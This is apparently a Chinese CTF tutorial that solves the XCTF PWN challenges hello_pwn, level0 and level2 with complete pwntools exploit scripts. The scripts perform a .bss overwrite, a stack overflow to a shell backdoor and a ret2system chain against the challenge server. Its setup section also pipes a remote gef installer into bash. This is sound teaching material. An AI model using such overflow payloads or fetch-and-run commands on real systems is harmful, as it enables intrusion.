CTF PWN-从零到一：XCTF新手区实战通关精解

1. 初识CTF PWN：从"砰"的一声开始

第一次听说PWN这个词时，我还以为是什么游戏术语。后来才知道，这个词源自黑客圈的行话，模拟的是系统被攻破时"砰"的声响。在CTF比赛中，PWN题型就是通过分析二进制程序的漏洞，编写利用代码(EXP)来获取系统控制权。记得我第一次在XCTF平台看到PWN题时，面对那一堆汇编代码和内存地址，整个人都是懵的。

PWN题通常运行在Linux环境下，我们需要通过逆向分析找到漏洞点，然后用Python编写攻击脚本。常见的漏洞类型包括：

• 栈溢出：向固定大小的栈缓冲区写入超长数据
• 堆溢出：操作堆内存时超出分配的空间
• 格式化字符串漏洞：利用printf等函数的不当使用
• 整数溢出：数值计算超出变量存储范围

新手建议从攻防世界(XCTF)平台的入门题开始，比如著名的"level0"和"hello_pwn"。这些题目设计精巧，既包含了基础漏洞类型，又不会太过复杂。

2. 环境搭建：工欲善其事

刚开始玩PWN时，我在环境配置上就栽了跟头。建议大家直接使用Linux系统，推荐Kali或Ubuntu。Windows用户可以用WSL，但某些工具可能兼容性不佳。

必备工具清单：

• pwntools：Python编写的漏洞利用框架
• IDA Pro/Ghidra：反汇编和逆向分析
• GDB：动态调试工具
• checksec：检查程序保护机制
• ROPgadget：查找ROP链的工具

安装pwntools时有个小技巧：

pip install pwntools # 如果报错可以尝试 apt-get update && apt-get install python3-pip pip install --upgrade pip

配置GDB增强功能也很重要，推荐使用peda或gef：

# 安装gef bash -c "$(curl -fsSL https://gef.blah.cat/sh)"

3. 第一个PWN题：hello_pwn详解

让我们以XCTF的"hello_pwn"为例，手把手完成一次完整的PWN实战。

3.1 初步分析

首先下载题目附件，用file命令查看文件类型：

file hello_pwn # 输出：ELF 64-bit LSB executable, x86-64...

用checksec检查保护机制：

checksec --file=hello_pwn

结果显示只开启了NX保护，意味着栈上的数据不可执行。

3.2 逆向分析

用IDA打开程序，查看main函数伪代码：

int __cdecl main(int argc, const char **argv, const char **envp) { setbuf(stdout, 0LL); puts("Welcome to XCTF!"); puts("Let's pwn it!"); read(0, &unk_601068, 0x10uLL); if ( dword_60106C == 1853186401 ) sub_400686(); return 0; }

关键点分析：

1. 程序读取用户输入到地址0x601068
2. 检查0x60106C处的值是否为1853186401(0x6E756161)
3. 如果条件满足，调用sub_400686函数

继续分析sub_400686：

void sub_400686() { system("cat flag.txt"); }

3.3 漏洞利用

观察内存布局：

• unk_601068和dword_60106C都位于.bss段
• 两者地址相差4字节(0x60106C - 0x601068 = 4)
• read函数允许输入16字节(0x10)

这意味着我们可以：

1. 输入4字节填充unk_601068
2. 接着写入1853186401覆盖dword_60106C

3.4 EXP编写

使用pwntools编写攻击脚本：

from pwn import * context.log_level = 'debug' # 本地测试 # p = process('./hello_pwn') # 远程连接 p = remote('111.200.241.244', 65238) payload = b'A'*4 + p64(1853186401) p.sendlineafter(b'Let\'s pwn it!\n', payload) p.interactive()

关键点说明：

• p64()将整数打包为64位小端序字节
• sendlineafter确保在正确时机发送payload
• interactive()进入交互模式查看flag

4. 栈溢出实战：level0解题指南

4.1 题目分析

检查保护机制：

checksec level0

结果显示是64位程序，只开启了NX保护。

IDA分析main函数：

int __cdecl main(int argc, const char **argv, const char **envp) { write(1, "Hello, World\n", 0xDuLL); vulnerable_function(); return 0; }

vulnerable_function存在明显的栈溢出：

ssize_t vulnerable_function() { char buf[128]; // [rsp+0h] [rbp-80h] return read(0, buf, 0x200uLL); }

4.2 寻找后门

在字符串窗口发现"/bin/sh"，跟踪发现callsystem函数：

int callsystem() { return system("/bin/sh"); }

4.3 构造ROP链

计算偏移量：

• buf起始于rbp-0x80
• 需要覆盖0x80字节到rbp
• 再覆盖8字节rbp本身
• 最后覆盖返回地址

EXP脚本：

from pwn import * context(arch='amd64', os='linux') p = remote('111.200.241.244', 54800) elf = ELF('./level0') callsystem = elf.symbols['callsystem'] payload = b'A'*0x80 + b'B'*8 + p64(callsystem) p.sendline(payload) p.interactive()

5. 进阶技巧：ROP与内存泄露

当程序没有现成的后门函数时，我们需要使用更高级的技巧。以level2为例：

5.1 题目分析

32位程序，开启了NX保护。vulnerable_function存在栈溢出：

ssize_t vulnerable_function() { char buf[136]; // [esp+0h] [ebp-88h] return read(0, buf, 0x100u); }

5.2 利用思路

程序中有system和"/bin/sh"字符串，但没有直接调用。我们需要：

1. 覆盖返回地址为system函数
2. 构造伪栈帧，将"/bin/sh"地址作为参数

5.3 EXP编写

from pwn import * p = remote('111.200.241.244', 51837) elf = ELF('./level2') system = elf.plt['system'] binsh = next(elf.search(b'/bin/sh')) payload = b'A'*140 # 填充到返回地址 payload += p32(system) # 返回地址 payload += p32(0xdeadbeef) # 伪造返回地址 payload += p32(binsh) # 参数 p.sendlineafter(b'Input:', payload) p.interactive()

6. 常见问题与调试技巧

新手常遇到的坑：

1. 偏移量计算错误：使用cyclic工具生成模式字符串
2. 字节序问题：牢记小端序存储
3. 环境差异：本地和远程的libc版本可能不同

调试技巧：

# GDB调试 gdb ./pwn_program break *0x400123 run < input.txt # 查看内存 x/20wx $esp x/s 0x804a000 # 查看寄存器 info registers

pwntools调试：

context.log_level = 'debug' gdb.attach(p, 'break *0x400123\ncontinue')

记住，PWN是一个需要大量实践的领域。每个题目都是独特的，但解题思路往往相通。从简单的栈溢出开始，逐步挑战更复杂的漏洞类型，你会慢慢体会到二进制安全的魅力。